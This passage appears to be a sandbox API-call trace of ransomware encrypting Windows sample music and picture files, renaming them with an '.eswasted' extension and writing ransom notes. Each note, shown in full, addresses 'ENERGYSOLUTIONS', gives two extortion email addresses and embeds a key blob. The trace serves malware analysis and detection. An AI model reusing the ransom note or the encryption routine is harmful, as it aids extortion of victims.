KEY:\r\n[begin_key]B13TRv1cgthQmB/CLPhEdqjY4pllGAAVnJECxTWJICXDqCo0yGhSaGFo7BcF4HPv\r\nNPdYU4fHwwImvPFrnBEnRKgzPdefl8ubWnYB4AeD6wuLHG2aPlxg4mvM5gkSI9qX\r\ncU4G3iqHUKPvePf4nXgJsmawCF7QcI7kU5aXczzEWl4NvB/v7VloNQMTArpK9KaJ\r\nOzLPF8wJ+pkxkHf2oIJGIuza/XjmJCPufm8USOMMQj2Ke5iqi7zXLOMOdgM/bHM/\r\n3BoIJ/ZwuL3GHGQWwGciRZ+jglskNYVzx06/+jL9GUzuSzLIjhDVDW6XNp0iUe7f\r\nb8uaFTISgWoAQvhG3MWXQw7CjvsNF3l249ldsdYGGsRNRimz19xu2exxi3OitMEB\r\nLElfbynSyZVcVPV/ARJ/xylhb4ZpOjRawktB6BdJNpeEBhmb6Zot1X+pRds4qnHI\r\nmR2qAL9uvek2a1jytvC3I5/bmP/HY1Iic9vOavNd9loI/rY8nloxWoh48wQpOvzu\r\ngk/BbMQdELQi8TsQYlB/LqGvpZWw9r/MoJ3oBg/NJhkzl293L+FAT/6h9lqCmX6H\r\nHOODv9bk+MqzlACrJb36Onz6OsTNg1cWSFp5WFUn8zpipY1lKBfjntvV/AcFo8NK\r\n4HqJ7Cr4PgiiUFszjotdYUKwVUfJhg4yNKoWpD6owwu=[end_key]\r\nKEEP IT\r\n") returned 990 [0083.931] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea458 | out: hHeap=0x4a0000) returned 1 [0083.931] WriteFile (in: hFile=0x100, lpBuffer=0x4e09f0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4e09f0*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0083.931] SetEndOfFile (hFile=0x100) returned 1 [0083.933] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e09f0 | out: hHeap=0x4a0000) returned 1 [0083.933] CloseHandle (hObject=0x100) returned 1 [0083.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0083.934] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e1d88 | out: hHeap=0x4a0000) returned 1 [0083.934] _aulldvrm () returned 0x0 [0083.934] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0083.935] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0083.935] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.935] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3") returned 68 [0083.935] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x292) returned 0x4d91a8 [0083.935] lstrcpyW (in: lpString1=0x4d9230, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0083.935] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea250 [0083.935] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0083.935] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea250 | out: pbBuffer=0x4ea250) returned 1 [0083.936] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0083.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.eswasted_info" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0083.936] WriteFile (in: hFile=0x100, lpBuffer=0x4ea250*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ea250*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0083.937] SetEndOfFile (hFile=0x100) returned 1 [0083.937] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0083.937] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0083.937] lstrcpyW (in: lpString1=0x4d9230, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0083.937] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.eswasted")) returned 1 [0083.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Maid with the Flaxen Hair.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\maid with the flaxen hair.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0083.938] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0083.938] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x3ec5d2 [0083.938] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3ec5d2) returned 0x1b30000 [0083.939] CloseHandle (hObject=0xfc) returned 1 [0084.264] UnmapViewOfFile (lpBaseAddress=0x1b30000) returned 1 [0084.318] CloseHandle (hObject=0x120) returned 1 [0084.325] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea250 [0084.327] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0084.328] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea298 | out: pbBuffer=0x4ea298) returned 1 [0084.328] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.328] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0084.329] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0084.329] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.338] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea458 [0084.338] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0084.338] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0084.338] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]oV1a2Y6/5exWd2BvkVPjKa2Ogbc0QsoBcKH6viZQH+VDEFdNrWbU+kxvexfvAGHC\r\nEfKoswTs6W6zkQJpO8sL9xpGVnKNXNbErUNZnr46NFZo6XZCBhhv+0+tNlGvJnwE\r\n+5o5xD4kRfiH7Ggt3NJPDjrArq7C0OHd0mL6rQp+b0Hs3Bjliv43AmxdZ6Py74ZZ\r\nUrNp/RnkPomXD24N8oyw9uF5zxl3afkRcEPogzPf/j8i1oEqFLODep3uSdd3UIWi\r\nrWAGKwhuY0U/c9IjTnAil8KyZDpoh254ATKEGNEn2MucxoNHunjhbfyjOG9GozpM\r\n1ok14iiY1OLGx0vOL5Z8h85yjnZjcFdXS+Xb923FGTLP8IGQIlua7aeQ167AkDLu\r\nw/ECNuRXP7ZEkJ3/5FFHj6XMVMw3ItIbJ29NRUbYFo41158o8IFn6Un42hEqH0qO\r\ntNLkX3rg6x3E2urvQDF51pXN3+4hlA2+12cv1+f+yoI5lGR6O5P6QGML39bro6wg\r\nmwV12o2h1da8/BXZRVO3jK2jMN4RUD30q82ejqPy4qPEAVUCOzPVzvjUaI/RHXYs\r\nnq3qQfD95PC7e6gUY6vA4uJRa65Luy6Pn4fusbkw0HOzeF3Iwnqw2AJAaY5KNTZQ\r\nV8wI28LxI8ONfLdQNMJd9mrbl3weibDpns3qC7sTvb8=[end_key]\r\nKEEP IT\r\n") returned 990 [0084.338] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea458 | out: hHeap=0x4a0000) returned 1 [0084.338] WriteFile (in: hFile=0x100, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0084.338] SetEndOfFile (hFile=0x100) returned 1 [0084.341] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0084.341] CloseHandle (hObject=0x100) returned 1 [0084.341] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0084.341] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x500a28 | out: hHeap=0x4a0000) returned 1 [0084.341] _aulldvrm () returned 0x0 [0084.341] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0084.342] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0084.342] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.342] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3") returned 53 [0084.342] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x274) returned 0x4d91a8 [0084.342] lstrcpyW (in: lpString1=0x4d9212, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0084.342] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea250 [0084.342] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0084.343] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea250 | out: pbBuffer=0x4ea250) returned 1 [0084.343] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.343] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.eswasted_info" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0084.343] WriteFile (in: hFile=0x100, lpBuffer=0x4ea250*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ea250*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0084.344] SetEndOfFile (hFile=0x100) returned 1 [0084.344] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.345] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea250 | out: hHeap=0x4a0000) returned 1 [0084.345] lstrcpyW (in: lpString1=0x4d9212, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0084.345] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.eswasted")) returned 1 [0084.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Sleep Away.mp3.eswasted" (normalized: "c:\\users\\public\\music\\sample music\\sleep away.mp3.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0084.347] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0084.347] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0x49e459 [0084.347] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x49e459) returned 0x1b30000 [0084.347] CloseHandle (hObject=0x120) returned 1 [0085.058] UnmapViewOfFile (lpBaseAddress=0x1b30000) returned 1 [0085.173] CloseHandle (hObject=0xfc) returned 1 [0085.174] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea260 [0085.174] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0085.175] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2a8 | out: pbBuffer=0x4ea2a8) returned 1 [0085.175] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.175] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0085.176] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0085.176] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.184] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea468 [0085.184] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.184] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.184] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]uYgttPLrsLVEVWfB8iin8Oq5mGjP0wLlTc6wZaTb8EXD5HSIp8nEr8rfvJPOmfke\r\n7DjmAlRmYTY4NUAVACLZxhUMnvFlhbcvZOUIBjfBzvOtihGRRv9fmeOAIsZi2VxE\r\nFi+re2gA0ty5/PE90NVN4Mtrqm7BJAvC6Qf1hEkL7AWfB1Hz6v/+5FmyDTUXS3f2\r\nGwse88M+odHtjejj3FSm205V3FXD56HCM6IVoT3SiPDhArGNI+fVeFKzxM494f5x\r\nI+9jcw06fJZCRW1jJazHkraI8j0cunycmdvJaLAg9FP2djiBlW0MbOnJsIc1REo3\r\nRZJZz9L9TEj/vMuy516HKU/C0vpRf75Q8AX3BlkI8zjW3DNNcNCIZxZ0QZaetQGU\r\n37tB4X+j73jZ6vfCMwE22bqzkFyinFaLqSFoRh+PdnYPSxTPobZj/msZWJC09+o2\r\nofo3rvlqjv2wk5ueK42KpcwU6m8hOg4vrfKg+jsfQKOShKJmziV/mXWfm7JfG7GR\r\nd8X0sTY3DOZcgrWDxCBN4qorSVCrm6ZHNYfhVZuIzmfFWiVShUxKbg8hAxNiAepZ\r\nHUTtVSuuII6vND1bBhNGrHCcudUQARD1QU0uvjNa4AjkjSnj3LOBmQBB3WWUS1RU\r\nWHPCUNLqIpi5E0UNYg46KzlFCxzvIfMHjBUfp5roanv=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.184] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea468 | out: hHeap=0x4a0000) returned 1 [0085.184] WriteFile (in: hFile=0x100, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0085.185] SetEndOfFile (hFile=0x100) returned 1 [0085.187] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.187] CloseHandle (hObject=0x100) returned 1 [0085.187] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0085.187] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dfb38 | out: hHeap=0x4a0000) returned 1 [0085.187] _aulldvrm () returned 0x0 [0085.187] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0085.188] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0085.188] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.188] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0085.188] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x27e) returned 0x4d91a8 [0085.189] lstrcpyW (in: lpString1=0x4d921c, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.189] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea260 [0085.189] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0085.189] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea260 | out: pbBuffer=0x4ea260) returned 1 [0085.189] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.189] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0085.190] WriteFile (in: hFile=0x100, lpBuffer=0x4ea260*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4ea260*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0085.191] SetEndOfFile (hFile=0x100) returned 1 [0085.191] SetFilePointer (in: hFile=0x100, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.191] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.191] lstrcpyW (in: lpString1=0x4d921c, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.eswasted")) returned 1 [0085.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0085.196] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0085.196] GetFileSize (in: hFile=0xfc, lpFileSizeHigh=0x111fdd4 | out: lpFileSizeHigh=0x111fdd4*=0x0) returned 0xbd616 [0085.196] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbd616) returned 0x12c0000 [0085.196] CloseHandle (hObject=0xfc) returned 1 [0085.271] UnmapViewOfFile (lpBaseAddress=0x12c0000) returned 1 [0085.279] CloseHandle (hObject=0x110) returned 1 [0085.279] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea258 [0085.279] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0085.280] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2a0 | out: pbBuffer=0x4ea2a0) returned 1 [0085.280] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.280] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0085.280] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0085.280] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.289] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea460 [0085.289] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea258 | out: hHeap=0x4a0000) returned 1 [0085.289] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.289] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rgLBKhc87XvsgcViaYE0eZnhNyIgkgpw3C1vZ7eNa+2eDVXWDr7bXlnKSDcVXc52\r\nXjdraN5AP/nYpfxZLy5fZkE2UeO/xLKJFuNidIR/Tu9k1KtUa3mx4bH/js92h+aC\r\nA3zUNxUKv/gz1bzM7Ffsxquw8FX3blpV6vWZcA1Cns5pkFS4oYYawt39GhuHmrtK\r\nAvKWci4SVQTTn0S91K43vc5gXent+KdAbFN2TxqGvssw+Tszg9BM/k70Es840QPJ\r\nPSmGXMwcFu8iIZR7zaEFH0LWv9Ez+7DsAL11HFYGN0AuAR+HaVj6ZqxyeForyVlX\r\nR9WaYyoSIWBflDtvl0ygplcaFsNOez7w29XXk6KPYdrHNFZJ3osLb/psqxm2BjRy\r\nTFMAaGNGp4GFsj/OiBHXNhfbPRSmT9D/NYh+wLMqUJiAgOiYst5dckJBAitggP7+\r\n9s4JnPKIbN4p7WZvcVivwUEMJyIQcc38k26QLvPzwM8dNtIGHxSjsN3ccGMzYvaW\r\nLRthKmGV1zkcf1lB5Ects7Rr7bdascVhxVliR+4eozIxGmAD/yVVKRUiE0yGhYv2\r\n7sEjMycwmekP4R/KXwl4dSyoudrrb+zdyeSRwzHJmBQNv4lpG3r15mffL5ugd5jF\r\nfB4/D20cGtUTfPYsjGwtnagY5NolHDu6Z5HrlNlIBWt=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.289] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea460 | out: hHeap=0x4a0000) returned 1 [0085.289] WriteFile (in: hFile=0x100, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x111fe38, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x111fe38*=0x7bc, lpOverlapped=0x0) returned 1 [0085.289] SetEndOfFile (hFile=0x100) returned 1 [0085.291] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.291] CloseHandle (hObject=0x100) returned 1 [0085.291] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0085.291] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4eb8 | out: hHeap=0x4a0000) returned 1 [0085.292] _aulldvrm () returned 0x0 [0085.292] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0085.292] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0085.292] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.292] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Lighthouse.jpg") returned 59 